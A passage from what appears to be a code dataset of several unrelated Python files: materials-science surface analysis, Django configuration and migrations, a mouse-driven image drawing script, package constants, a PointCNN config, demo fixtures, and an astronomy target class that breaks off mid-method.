the key is a sympy Symbol and the value is a float (chempot).
Args:
entry (SlabEntry): Computed structure entry of the slab
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
Returns:
Dictionary of set chemical potential values
"""
# Set up the variables
all_delu_dict = {}
for du in self.list_of_chempots:
if delu_dict and du in delu_dict.keys():
all_delu_dict[du] = delu_dict[du]
elif du == 1:
all_delu_dict[du] = du
else:
all_delu_dict[du] = delu_default
return all_delu_dict
# def surface_phase_diagram(self, y_param, x_param, miller_index):
# return
#
# def wulff_shape_extrapolated_model(self):
# return
#
# def surface_pourbaix_diagram(self):
#
# return
#
# def surface_p_vs_t_phase_diagram(self):
#
# return
#
# def broken_bond_vs_gamma(self):
#
# return
def entry_dict_from_list(all_slab_entries):
"""
Converts a list of SlabEntry to an appropriate dictionary. It is
assumed that if there is no adsorbate, then it is a clean SlabEntry
and that adsorbed SlabEntry has the clean_entry parameter set.
Args:
all_slab_entries (list): List of SlabEntry objects
Returns:
(dict): Dictionary of SlabEntry with the Miller index as the main
key to a dictionary with a clean SlabEntry as the key to a
list of adsorbed SlabEntry.
"""
entry_dict = {}
for entry in all_slab_entries:
hkl = tuple(entry.miller_index)
if hkl not in entry_dict.keys():
entry_dict[hkl] = {}
if entry.clean_entry:
clean = entry.clean_entry
else:
clean = entry
if clean not in entry_dict[hkl].keys():
entry_dict[hkl][clean] = []
if entry.adsorbates:
entry_dict[hkl][clean].append(entry)
return entry_dict
class WorkFunctionAnalyzer:
"""
A class used for calculating the work function
from a slab model and visualizing the behavior
of the local potential along the slab.
.. attribute:: efermi
The Fermi energy
.. attribute:: locpot_along_c
Local potential in eV along points along the axis
.. attribute:: vacuum_locpot
The maximum local potential along the c direction for
the slab model, ie the potential at the vacuum
.. attribute:: work_function
The minimum energy needed to move an electron from the
surface to infinity. Defined as the difference between
the potential at the vacuum and the Fermi energy.
.. attribute:: slab
The slab structure model
.. attribute:: along_c
Points along the c direction with same
increments as the locpot in the c axis
.. attribute:: ave_locpot
Mean of the minimum and maximmum (vacuum) locpot along c
.. attribute:: sorted_sites
List of sites from the slab sorted along the c direction
.. attribute:: ave_bulk_p
The average locpot of the slab region along the c direction
"""
def __init__(self, structure, locpot_along_c, efermi, shift=0, blength=3.5):
"""
Initializes the WorkFunctionAnalyzer class.
Args:
structure (Structure): Structure object modelling the surface
locpot_along_c (list): Local potential along the c direction
outcar (MSONable): Outcar vasp output object
shift (float): Parameter to translate the slab (and
therefore the vacuum) of the slab structure, thereby
translating the plot along the x axis.
blength (float (Ang)): The longest bond length in the material.
Used to handle pbc for noncontiguous slab layers
"""
# ensure shift between 0 and 1
if shift < 0:
shift += -1 * int(shift) + 1
elif shift >= 1:
shift -= int(shift)
self.shift = shift
# properties that can be shifted
slab = structure.copy()
slab.translate_sites([i for i, site in enumerate(slab)], [0, 0, self.shift])
self.slab = slab
self.sorted_sites = sorted(self.slab, key=lambda site: site.frac_coords[2])
# Get the plot points between 0 and c
# increments of the number of locpot points
self.along_c = np.linspace(0, 1, num=len(locpot_along_c))
# Get the plot points between 0 and c
# increments of the number of locpot points
locpot_along_c_mid, locpot_end, locpot_start = [], [], []
for i, s in enumerate(self.along_c):
j = s + self.shift
if j > 1:
locpot_start.append(locpot_along_c[i])
elif j < 0:
locpot_end.append(locpot_along_c[i])
else:
locpot_along_c_mid.append(locpot_along_c[i])
self.locpot_along_c = locpot_start + locpot_along_c_mid + locpot_end
# identify slab region
self.slab_regions = get_slab_regions(self.slab, blength=blength)
# get the average of the signal in the bulk-like region of the
# slab, i.e. the average of the oscillating region. This gives
# a rough appr. of the potential in the interior of the slab
bulk_p = []
for r in self.slab_regions:
bulk_p.extend([p for i, p in enumerate(self.locpot_along_c) if r[1] >= self.along_c[i] > r[0]])
if len(self.slab_regions) > 1:
bulk_p.extend([p for i, p in enumerate(self.locpot_along_c) if self.slab_regions[1][1] <= self.along_c[i]])
bulk_p.extend([p for i, p in enumerate(self.locpot_along_c) if self.slab_regions[0][0] >= self.along_c[i]])
self.ave_bulk_p = np.mean(bulk_p)
# shift independent quantities
self.efermi = efermi
self.vacuum_locpot = max(self.locpot_along_c)
# get the work function
self.work_function = self.vacuum_locpot - self.efermi
# for setting ylim and annotating
self.ave_locpot = (self.vacuum_locpot - min(self.locpot_along_c)) / 2
def get_locpot_along_slab_plot(self, label_energies=True, plt=None, label_fontsize=10):
"""
Returns a plot of the local potential (eV) vs the
position along the c axis of the slab model (Ang)
Args:
label_energies (bool): Whether to label relevant energy
quantities such as the work function, Fermi energy,
vacuum locpot, bulk-like locpot
plt (plt): Matplotlib pylab object
label_fontsize (float): Fontsize of labels
Returns plt of the locpot vs c axis
"""
plt = pretty_plot(width=6, height=4) if not plt else plt
# plot the raw locpot signal along c
plt.plot(self.along_c, self.locpot_along_c, "b--")
# Get the local averaged signal of the locpot along c
xg, yg = [], []
for i, p in enumerate(self.locpot_along_c):
# average signal is just the bulk-like potential when in the slab region
in_slab = False
for r in self.slab_regions:
if r[0] <= self.along_c[i] <= r[1]:
in_slab = True
if len(self.slab_regions) > 1:
if self.along_c[i] >= self.slab_regions[1][1]:
in_slab = True
if self.along_c[i] <= self.slab_regions[0][0]:
in_slab = True
if in_slab:
yg.append(self.ave_bulk_p)
xg.append(self.along_c[i])
elif p < self.ave_bulk_p:
yg.append(self.ave_bulk_p)
xg.append(self.along_c[i])
else:
yg.append(p)
xg.append(self.along_c[i])
xg, yg = zip(*sorted(zip(xg, yg)))
plt.plot(xg, yg, "r", linewidth=2.5, zorder=-1)
# make it look nice
if label_energies:
plt = self.get_labels(plt, label_fontsize=label_fontsize)
plt.xlim([0, 1])
plt.ylim([min(self.locpot_along_c), self.vacuum_locpot + self.ave_locpot * 0.2])
plt.xlabel(r"Fractional coordinates ($\hat{c}$)", fontsize=25)
plt.xticks(fontsize=15, rotation=45)
plt.ylabel(r"Potential (eV)", fontsize=25)
plt.yticks(fontsize=15)
return plt
def get_labels(self, plt, label_fontsize=10):
"""
Handles the optional labelling of the plot with relevant quantities
Args:
plt (plt): Plot of the locpot vs c axis
label_fontsize (float): Fontsize of labels
Returns Labelled plt
"""
# center of vacuum and bulk region
if len(self.slab_regions) > 1:
label_in_vac = (self.slab_regions[0][1] + self.slab_regions[1][0]) / 2
if abs(self.slab_regions[0][0] - self.slab_regions[0][1]) > abs(
self.slab_regions[1][0] - self.slab_regions[1][1]
):
label_in_bulk = self.slab_regions[0][1] / 2
else:
label_in_bulk = (self.slab_regions[1][1] + self.slab_regions[1][0]) / 2
else:
label_in_bulk = (self.slab_regions[0][0] + self.slab_regions[0][1]) / 2
if self.slab_regions[0][0] > 1 - self.slab_regions[0][1]:
label_in_vac = self.slab_regions[0][0] / 2
else:
label_in_vac = (1 + self.slab_regions[0][1]) / 2
plt.plot([0, 1], [self.vacuum_locpot] * 2, "b--", zorder=-5, linewidth=1)
xy = [label_in_bulk, self.vacuum_locpot + self.ave_locpot * 0.05]
plt.annotate(
f"$V_{{vac}}={self.vacuum_locpot:.2f}$",
xy=xy,
xytext=xy,
color="b",
fontsize=label_fontsize,
)
# label the fermi energy
plt.plot([0, 1], [self.efermi] * 2, "g--", zorder=-5, linewidth=3)
xy = [label_in_bulk, self.efermi + self.ave_locpot * 0.05]
plt.annotate(
f"$E_F={self.efermi:.2f}$",
xytext=xy,
xy=xy,
fontsize=label_fontsize,
color="g",
)
# label the bulk-like locpot
plt.plot([0, 1], [self.ave_bulk_p] * 2, "r--", linewidth=1.0, zorder=-1)
xy = [label_in_vac, self.ave_bulk_p + self.ave_locpot * 0.05]
plt.annotate(
f"$V^{{interior}}_{{slab}}={self.ave_bulk_p:.2f}$",
xy=xy,
xytext=xy,
color="r",
fontsize=label_fontsize,
)
# label the work function as a barrier
plt.plot(
[label_in_vac] * 2,
[self.efermi, self.vacuum_locpot],
"k--",
zorder=-5,
linewidth=2,
)
xy = [label_in_vac, self.efermi + self.ave_locpot * 0.05]
plt.annotate(
rf"$\Phi={self.work_function:.2f}$",
xy=xy,
xytext=xy,
fontsize=label_fontsize,
)
return plt
def is_converged(self, min_points_frac=0.015, tol=0.0025):
"""
A well converged work function should have a flat electrostatic
potential within some distance (min_point) about where the peak
electrostatic potential is found along the c direction of the
slab. This is dependent on the size of the slab.
Args:
min_point (fractional coordinates): The number of data points
+/- the point of where the electrostatic potential is at
its peak along the c direction.
tol (float): If the electrostatic potential stays the same
within this tolerance, within the min_points, it is converged.
Returns a bool (whether or not the work function is converged)
"""
conv_within = tol * (max(self.locpot_along_c) - min(self.locpot_along_c))
min_points = int(min_points_frac * len(self.locpot_along_c))
peak_i = self.locpot_along_c.index(self.vacuum_locpot)
all_flat = []
for i in range(len(self.along_c)):
if peak_i - min_points < i < peak_i + min_points:
if abs(self.vacuum_locpot - self.locpot_along_c[i]) > conv_within:
all_flat.append(False)
else:
all_flat.append(True)
return all(all_flat)
@staticmethod
def from_files(poscar_filename, locpot_filename, outcar_filename, shift=0, blength=3.5):
"""
:param poscar_filename: POSCAR file
:param locpot_filename: LOCPOT file
:param outcar_filename: OUTCAR file
:param shift: shift
:param blength: The longest bond length in the material.
Used to handle pbc for noncontiguous slab layers
:return: WorkFunctionAnalyzer
"""
p = Poscar.from_file(poscar_filename)
l = Locpot.from_file(locpot_filename)
o = Outcar(outcar_filename)
return WorkFunctionAnalyzer(
p.structure,
l.get_average_along_axis(2),
o.efermi,
shift=shift,
blength=blength,
)
class NanoscaleStability:
"""
A class for analyzing the stability of nanoparticles of different
polymorphs with respect to size. The Wulff shape will be the
model for the nanoparticle. Stability will be determined by
an energetic competition between the weighted surface energy
(surface energy of the Wulff shape) and the bulk energy. A
future release will include a 2D phase diagram (e.g. wrt size
vs chempot for adsorbed or nonstoichiometric surfaces). Based
on the following work:
Kang, S., Mo, Y., Ong, S. P., & Ceder, G. (2014). Nanoscale
stabilization of sodium oxides: Implications for Na-O2
batteries. Nano Letters, 14(2), 1016–1020.
https://doi.org/10.1021/nl404557w
.. attribute:: se_analyzers
List of SurfaceEnergyPlotter objects. Each item corresponds to a
different polymorph.
.. attribute:: symprec
See WulffShape.
"""
def __init__(self, se_analyzers, symprec=1e-5):
"""
Analyzes the nanoscale stability of different polymorphs.
"""
self.se_analyzers = se_analyzers
self.symprec = symprec
def solve_equilibrium_point(self, analyzer1, analyzer2, delu_dict={}, delu_default=0, units="nanometers"):
"""
Gives the radial size of two particles where equilibrium is reached
between both particles. NOTE: the solution here is not the same
as the solution visualized in the plot because solving for r
requires that both the total surface area and volume of the
particles are functions of r.
Args:
analyzer1 (SurfaceEnergyPlotter): Analyzer associated with the
first polymorph
analyzer2 (SurfaceEnergyPlotter): Analyzer associated with the
second polymorph
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
units (str): Can be nanometers or Angstrom
Returns:
Particle radius in nm
"""
# Set up
wulff1 = analyzer1.wulff_from_chempot(delu_dict=delu_dict, delu_default=delu_default, symprec=self.symprec)
wulff2 = analyzer2.wulff_from_chempot(delu_dict=delu_dict, delu_default=delu_default, symprec=self.symprec)
# Now calculate r
delta_gamma = wulff1.weighted_surface_energy - wulff2.weighted_surface_energy
delta_E = self.bulk_gform(analyzer1.ucell_entry) - self.bulk_gform(analyzer2.ucell_entry)
r = (-3 * delta_gamma) / (delta_E)
return r / 10 if units == "nanometers" else r
def wulff_gform_and_r(
self,
wulffshape,
bulk_entry,
r,
from_sphere_area=False,
r_units="nanometers",
e_units="keV",
normalize=False,
scale_per_atom=False,
):
"""
Calculates the formation energy of the particle with arbitrary radius r.
Args:
wulffshape (WulffShape): Initial, unscaled WulffShape
bulk_entry (ComputedStructureEntry): Entry of the corresponding bulk.
r (float (Ang)): Arbitrary effective radius of the WulffShape
from_sphere_area (bool): There are two ways to calculate the bulk
formation energy. Either by treating the volume and thus surface
area of the particle as a perfect sphere, or as a Wulff shape.
r_units (str): Can be nanometers or Angstrom
e_units (str): Can be keV or eV
normalize (bool): Whether or not to normalize energy by volume
scale_per_atom (True): Whether or not to normalize by number of
atoms in the particle
Returns:
particle formation energy (float in keV), effective radius
"""
# Set up
miller_se_dict = wulffshape.miller_energy_dict
new_wulff = self.scaled_wulff(wulffshape, r)
new_wulff_area = new_wulff.miller_area_dict
# calculate surface energy of the particle
if not from_sphere_area:
# By approximating the particle as a Wulff shape
w_vol = new_wulff.volume
tot_wulff_se = 0
for hkl, v in new_wulff_area.items():
tot_wulff_se += miller_se_dict[hkl] * v
Ebulk = self.bulk_gform(bulk_entry) * w_vol
new_r = new_wulff.effective_radius
else:
# By approximating the particle as a perfect sphere
w_vol = (4 / 3) * np.pi * r**3
sphere_sa = 4 * np.pi * r**2
tot_wulff_se = wulffshape.weighted_surface_energy * sphere_sa
Ebulk = self.bulk_gform(bulk_entry) * w_vol
new_r = r
new_r = new_r / 10 if r_units == "nanometers" else new_r
e = Ebulk + tot_wulff_se
e = e / 1000 if e_units == "keV" else e
e = e / ((4 / 3) * np.pi * new_r**3) if normalize else e
bulk_struct = bulk_entry.structure
density = len(bulk_struct) / bulk_struct.lattice.volume
e = e / (density * w_vol) if scale_per_atom else e
return e, new_r
@staticmethod
def bulk_gform(bulk_entry):
"""
Returns the formation energy of the bulk
Args:
bulk_entry (ComputedStructureEntry): Entry of the corresponding bulk.
"""
return bulk_entry.energy / bulk_entry.structure.lattice.volume
def scaled_wulff(self, wulffshape, r):
"""
Scales the Wulff shape with an effective radius r. Note that the resulting
Wulff does not necessarily have the same effective radius as the one
provided. The Wulff shape is scaled by its surface energies where first
the surface energies are scale by the minimum surface energy and then
multiplied by the given effective radius.
Args:
wulffshape (WulffShape): Initial, unscaled WulffShape
r (float): Arbitrary effective radius of the WulffShape
Returns:
WulffShape (scaled by r)
"""
# get the scaling ratio for the energies
r_ratio = r / wulffshape.effective_radius
miller_list = wulffshape.miller_energy_dict.keys()
# Normalize the magnitude of the facet normal vectors
# of the Wulff shape by the minimum surface energy.
se_list = np.array(list(wulffshape.miller_energy_dict.values()))
# Scale the magnitudes by r_ratio
scaled_se = se_list * r_ratio
return WulffShape(wulffshape.lattice, miller_list, scaled_se, symprec=self.symprec)
def plot_one_stability_map(
self,
analyzer,
max_r,
delu_dict=None,
label="",
increments=50,
delu_default=0,
plt=None,
from_sphere_area=False,
e_units="keV",
r_units="nanometers",
normalize=False,
scale_per_atom=False,
):
"""
Returns the plot of the formation energy of a particle against its
effect radius
Args:
analyzer (SurfaceEnergyPlotter): Analyzer associated with the
first polymorph
max_r (float): The maximum radius of the particle to plot up to.
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
label (str): Label of the plot for legend
increments (int): Number of plot points
delu_default (float): Default value for all unset chemical potentials
plt (pylab): Plot
from_sphere_area (bool): There are two ways to calculate the bulk
formation energy. Either by treating the volume and thus surface
area of the particle as a perfect sphere, or as a Wulff shape.
r_units (str): Can be nanometers or Angstrom
e_units (str): Can be keV or eV
normalize (str): Whether or not to normalize energy by volume
"""
plt = plt if plt else pretty_plot(width=8, height=7)
wulffshape = analyzer.wulff_from_chempot(delu_dict=delu_dict, delu_default=delu_default, symprec=self.symprec)
gform_list, r_list = [], []
for r in np.linspace(1e-6, max_r, increments):
gform, r = self.wulff_gform_and_r(
wulffshape,
analyzer.ucell_entry,
r,
from_sphere_area=from_sphere_area,
r_units=r_units,
e_units=e_units,
normalize=normalize,
scale_per_atom=scale_per_atom,
)
gform_list.append(gform)
r_list.append(r)
ru = "nm" if r_units == "nanometers" else r"\AA"
plt.xlabel(rf"Particle radius (${ru}$)")
eu = f"${e_units}/{ru}^3$"
plt.ylabel(rf"$G_{{form}}$ ({eu})")
plt.plot(r_list, gform_list, label=label)
return plt
def plot_all_stability_map(
self,
max_r,
increments=50,
delu_dict=None,
delu_default=0,
plt=None,
labels=None,
from_sphere_area=False,
e_units="keV",
r_units="nanometers",
normalize=False,
scale_per_atom=False,
):
"""
Returns the plot of the formation energy of a particles
of different polymorphs against its effect radius
Args:
max_r (float): The maximum radius of the particle to plot up to.
increments (int): Number of plot points
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
plt (pylab): Plot
labels (list): List of labels for each plot, corresponds to the
list of se_analyzers
from_sphere_area (bool): There are two ways to calculate the bulk
formation energy. Either by treating the volume and thus surface
area of the particle as a perfect sphere, or as a Wulff shape.
"""
plt = plt if plt else pretty_plot(width=8, height=7)
for i, analyzer in enumerate(self.se_analyzers):
label = labels[i] if labels else ""
plt = self.plot_one_stability_map(
analyzer,
max_r,
delu_dict,
label=label,
plt=plt,
increments=increments,
delu_default=delu_default,
from_sphere_area=from_sphere_area,
e_units=e_units,
r_units=r_units,
normalize=normalize,
scale_per_atom=scale_per_atom,
)
return plt
# class GetChempotRange:
# def __init__(self, entry):
# self.entry = entry
#
#
# class SlabEntryGenerator:
# def __init__(self, entry):
# self.entry = entry
def sub_chempots(gamma_dict, chempots):
"""
Uses dot product of numpy array to sub chemical potentials
into the surface grand potential. This is much faster
than using the subs function in sympy.
Args:
gamma_dict (dict): Surface grand potential equation
as a coefficient dictionary
chempots (dict): Dictionary assigning each chemical
potential (key) in gamma a value
Returns:
Surface energy as a float
"""
coeffs = [gamma_dict[k] for k in gamma_dict.keys()]
chempot_vals = []
for k in gamma_dict.keys():
if k not in chempots.keys():
chempot_vals.append(k)
elif k == 1:
chempot_vals.append(1)
else:
chempot_vals.append(chempots[k])
return np.dot(coeffs, chempot_vals)
|
py | 7dfad19c1f500217ed48cac2ccce000efcf2de51 | import os
from config import Instance
def get_torch_model_path(instance: Instance):
return os.path.join(instance.get_resources_path(), 'torch_model.torch')
def get_training_metrics_path(instance: Instance):
return os.path.join(instance.get_resources_path(), 'training_metrics.hdf5')
def get_transformed_dataset_path(instance: Instance):
return os.path.join(instance.get_resources_path('transformed_data'), 'transformed_data.npy')
def get_preprocessed_dataset_path(instance: Instance):
return os.path.join(instance.get_resources_path('preprocessed_data'), 'preprocessed_data.npy')
processed_data_folder = 'processed_data'
os.makedirs(processed_data_folder, exist_ok=True)
def get_cross_validation_scores_path():
return os.path.join(processed_data_folder, 'cv_scores.csv')
def get_best_model_torch_model_path():
return os.path.join(processed_data_folder, 'best_model.torch')
def get_best_model_training_metrics_path():
return os.path.join(processed_data_folder, 'best_model_training_metrics.hdf5')
def get_jupyter_path():
return './notebooks/results.ipynb'
def get_jupyter_html_path():
return os.path.join(processed_data_folder, 'results.html')
jupyter_plot_folder = os.path.join(processed_data_folder, 'jupyter_plots')
os.makedirs(jupyter_plot_folder, exist_ok=True)
def jupyter_plot(filename):
return os.path.join(jupyter_plot_folder, filename)
# def get_best_model_test_set_predictions_path():
# return os.path.join(processed_data_folder, 'best_model_test_set_predictions.hdf5')
|
py | 7dfad2c0c8c463e527fe901beef3a48f05007253 | """
WSGI config for data_converter project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "data_converter.settings")
application = get_wsgi_application() |
py | 7dfad2db7d89f2d74a210e665d5c4fe73a8e4bfc | # -*- coding: utf-8 -*-
# Generated by Django 1.11.27 on 2020-02-21 21:09
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('translations', '0007_populate_smstranslations'),
]
operations = [
migrations.RemoveField(
model_name='smstranslations',
name='couch_id',
),
]
|
py | 7dfad303117101f654751decd17ba2c240c12ee7 | import time
import sys
import os
cwd = os.getcwd()
from mouseAutomater import ImageController
from mouseAutomater import MouseAutomater
lsleep = 0.002
rsleep = 0.025
print("Created by HudZah\n\n\n")
imageName = ImageController.getImage()
handler = ImageController(imageName)
resizeValue = int(input("Output pixel size (for square image): "))
offset = int(input("Scale for image (1 for one to one): "))
resizeValue = resizeValue / offset
handler.convertToBW()
handler.resize(resizeValue)
returnKey = None
while returnKey == None:
MouseAutomater.openPaint()
print("Warning: There is no fail-safe other than pulling your mouse to the upper left corner, in case anything goes wrong once you start this program please abort using Ctrl + Alt + Delete \n\n\n")
print("Enter to start 3 second countdown, N to abort, pull to left hand corner to abort once the program starts")
print("Please position your cursor on a canvas on either Paint, Photoshop or any other design software as soon as you start running this. Make sure there is optimal space to completely draw the image.")
returnKey = input()
returnKey = returnKey.lower()
if returnKey == "n":
exit()
time.sleep(3)
array = handler.newImageArray()
MouseAutomater.imageToLines(array, offset, rsleep, lsleep)
repeat = "y"
while repeat == "y":
repeat = input("Type 'y' to repeat, or enter to exit")
repeat = repeat.lower()
if repeat == "y":
time.sleep(3)
MouseAutomater.imageToLines(array, offset, rsleep, lsleep)
else:
exit()
|
py | 7dfad4b3b69c976ad8fc6ceafb1cb3c35120a84f | """ 02
Escreva um programa que solicite uma frase ao usuário e
escreva a frase toda em maiúscula e sem espaços em branco.
"""
frase = input("Digite uma frase: ")
print(frase.upper().replace(" ", ""))
|
py | 7dfad4fa53372d4cce3178911aad6e24933dd61f | """
Package-wide constants.
| Copyright 2017-2020, Voxel51, Inc.
| `voxel51.com <https://voxel51.com/>`_
|
"""
from datetime import datetime
import os
try:
from importlib.metadata import metadata # Python 3.8
except ImportError:
from importlib_metadata import metadata # Python < 3.8
FIFTYONE_DIR = os.path.dirname(os.path.abspath(__file__))
FIFTYONE_CONFIG_DIR = os.path.join(os.path.expanduser("~"), ".fiftyone")
FIFTYONE_CONFIG_PATH = os.path.join(FIFTYONE_CONFIG_DIR, "config.json")
BASE_DIR = os.path.dirname(FIFTYONE_DIR)
RESOURCES_DIR = os.path.join(FIFTYONE_DIR, "resources")
DEV_INSTALL = os.path.isdir(
os.path.normpath(
os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", ".git")
)
)
# Package metadata
_META = metadata("fiftyone")
NAME = _META["name"]
VERSION = _META["version"]
DESCRIPTION = _META["summary"]
AUTHOR = _META["author"]
AUTHOR_EMAIL = _META["author-email"]
URL = _META["home-page"]
LICENSE = _META["license"]
VERSION_LONG = "%s v%s, %s" % (NAME, VERSION, AUTHOR)
COPYRIGHT = "2017-%d, %s" % (datetime.now().year, AUTHOR)
# MongoDB setup
try:
from fiftyone.db import FIFTYONE_DB_BIN_DIR
except ImportError:
# development installation
FIFTYONE_DB_BIN_DIR = os.path.join(FIFTYONE_CONFIG_DIR, "bin")
DB_PATH = os.path.join(FIFTYONE_CONFIG_DIR, "var/lib/mongo")
DB_LOG_PATH = os.path.join(FIFTYONE_CONFIG_DIR, "var/log/mongodb/mongo.log")
MIGRATIONS_PATH = os.path.join(FIFTYONE_CONFIG_DIR, "migrations")
MIGRATIONS_HEAD_PATH = os.path.join(MIGRATIONS_PATH, "head.json")
MIGRATIONS_REVISIONS_DIR = os.path.join(FIFTYONE_DIR, "migrations/revisions")
# Server setup
SERVER_DIR = os.path.join(FIFTYONE_DIR, "server")
SERVER_NAME = "localhost"
# App setup
try:
from fiftyone.gui import FIFTYONE_APP_DIR
except ImportError:
FIFTYONE_APP_DIR = os.path.normpath(
os.path.join(FIFTYONE_DIR, "../electron")
)
|
py | 7dfad65d0a96d74ebf3604ab767cb7bf759fa57f | # Generated by Django 3.2.2 on 2021-05-16 15:24
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('info', '0002_alter_info_phone_num'),
]
operations = [
migrations.RenameField(
model_name='info',
old_name='firday',
new_name='friday',
),
]
|
py | 7dfad852f45a72c216ed882398aa06467537aade | """TestDjango URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
import os
#from django.contrib import admin
from django.urls import path
from django.conf.urls import url,re_path,include
from zp import views as zp_views
from DataView import settings
if settings.DEBUG:
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.conf.urls.static import static
urlpatterns = [
#path('admin/', admin.site.urls,name='admin'),
re_path(r'^$',zp_views.home,name='home'),
path('zwyx/dd_index/',zp_views.zwyx_dd,name='zwyx_dd'),
path('zwyx/xl_index/',zp_views.zwyx_xl,name='zwyx_xl'),
path('zwyx/gsgm_index/',zp_views.zwyx_gsgm,name='zwyx_gsgm'),
path('zwyx/gsxz_index/',zp_views.zwyx_gsxz,name='zwyx_gsxz'),
path('zwyx/gshy_index/',zp_views.zwyx_gshy,name='zwyx_gshy'),
path('no_found/', zp_views.no_found,name='no_found'),
path('zwyx/type_index/',zp_views.zwyx_type,name='type_index'),
path('zwyx/zwyx_zw_count/',zp_views.zwyx_zw_count,name='zwyx_zw_count'),
path('zp/wordcloud/',zp_views.zp_word,name='zp_word'),
# 后台
path('admin/index/',zp_views.zp_admin_index,name='admin_index'),
path('admin/login/',zp_views.zp_admin_login,name='admin_login'),
path('admin/logout/',zp_views.zp_admin_logout,name='admin_logout'),
path('admin/refresh_captcha/',zp_views.refresh_captcha,name='refresh_captcha'),
path('admin/admin_dd/', zp_views.admin_dd, name='admin_dd'),
path('admin/admin_gsgm/', zp_views.admin_dd, name='admin_gsgm'),
path('admin/admin_gsxz/', zp_views.admin_dd, name='admin_gsxz'),
path('admin/admin_gshy/', zp_views.admin_dd, name='admin_gshy'),
path('admin/admin_xl/', zp_views.admin_dd, name='admin_xl'),
path('admin/admin_zwlb/', zp_views.admin_dd, name='admin_zwlb'),
path('admin/admin_list/', zp_views.admin_dd, name='admin_list'),
]
if settings.DEBUG:
urlpatterns += staticfiles_urlpatterns()
if not settings.DEBUG:
handler404 = "zp.views.page_not_found"
handler500 = "zp.views.sever_error"
captcha = [url(r'^captcha/', include('captcha.urls'),name='captcha')]
urlpatterns += captcha |
py | 7dfad8f14e1b88b9b6362f63d1ef2bf5e95540d5 | #!/usr/bin/python3
import os
import sys
import math
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import data_utils
load_fn = data_utils.load_cls_train_val
balance_fn = None
map_fn = None
keep_remainder = True
save_ply_fn = None
num_class = 40
batch_size = 128
sample_num = 1024
num_epochs = 512
step_val = 500
learning_rate_base = 0.01
decay_steps = 8000
decay_rate = 0.5
learning_rate_min = 1e-6
weight_decay = 1e-5
jitter = 0.0
jitter_val = 0.0
jitter_test = 0.0
rotation_range = [0, 0, 0, 'u']
rotation_range_val = [0, 0, 0, 'u']
rotation_range_test = [0, 0, 0, 'u']
rotation_order = 'rxyz'
scaling_range = [0, 0, 0, 'g']
scaling_range_val = [0, 0, 0, 'u']
scaling_range_test = [0, 0, 0, 'u']
sample_num_variance = 1 // 8
sample_num_clip = 1 // 4
x = 3
xconv_param_name = ('K', 'D', 'P', 'C', 'links')
xconv_params = [dict(zip(xconv_param_name, xconv_param)) for xconv_param in
[(8, 1, -1, 16 * x, []),
(12, 2, 384, 32 * x, []),
(16, 2, 128, 64 * x, []),
(16, 3, 128, 128 * x, [])]]
with_global = True
fc_param_name = ('C', 'dropout_rate')
fc_params = [dict(zip(fc_param_name, fc_param)) for fc_param in
[(128 * x, 0.0),
(64 * x, 0.8)]]
sampling = 'random'
optimizer = 'adam'
epsilon = 1e-2
data_dim = 6
use_extra_features = False
with_X_transformation = True
sorting_method = None
|
py | 7dfad9071a98c1024d7ff1e2c231650f9be56dea | from lino.api import rt
def objects():
Country = rt.models.chooser.Country
City = rt.models.chooser.City
be = Country(name="Belgium")
yield be
yield City(name="Brussels", country=be)
yield City(name="Eupen", country=be)
yield City(name="Gent", country=be)
fr = Country(name="France")
yield fr
yield City(name="Paris", country=fr)
yield City(name="Bordeaux", country=fr)
ee = Country(name="Estonia")
yield ee
yield City(name="Tallinn", country=ee)
yield City(name="Tartu", country=ee)
yield City(name="Narva", country=ee)
|
py | 7dfad9e4b96c5f1b125197d7ef578c87d9ef443d | # -*- coding: utf-8 -*-
#
# @Author: Richard J. Mathar <[email protected]>
# @Date: 2021-11.21
# @Filename: target.py
# @License: BSD 3-clause (http://www.opensource.org/licenses/BSD-3-Clause)
"""
Python3 class for siderostat field angles using homogeneous coordinates
"""
import sys
import math
import numpy
import astropy.coordinates
import astropy.time
import astropy.units
from .ambient import Ambient
from .site import Site
__all__ = ['Target']
class Target():
""" sidereal astronomical target
"""
def __init__(self, targ) :
""" target coordinates
:param targ Position in equatorial coordinates
:type targ astropy.coordinates.Skycoord
"""
if isinstance(targ, astropy.coordinates.SkyCoord) :
self.targ = targ
else :
raise TypeError("invalid data types")
# print(self.targ)
def toHoriz(self, site, ambi = None, time = None) :
""" convert from equatorial to horizontal coordinates
:param site Observatory location
:type site fieldrotation.Site
:param ambi Ambient parameters used for refraction correction
:type ambi fieldrotation.Ambient
:param time time of the observation
:type time astropy.time.Time
:return alt-az coordinates
:return type astropy.coordinates.AltAz
"""
if isinstance(time, astropy.time.Time) :
now = time
elif isinstance(time, str):
now = astropy.time.Time(time, format='isot', scale='utc')
elif time is None:
now = astropy.time.Time.now()
if isinstance(site, Site) :
if ambi is None:
refr = Ambient(site = site)
elif isinstance(site, Ambient) :
refr = ambi
else :
raise TypeError("invalid ambi data type")
earthloc = site.toEarthLocation()
else :
raise TypeError("invalid site data type")
# print(earthloc)
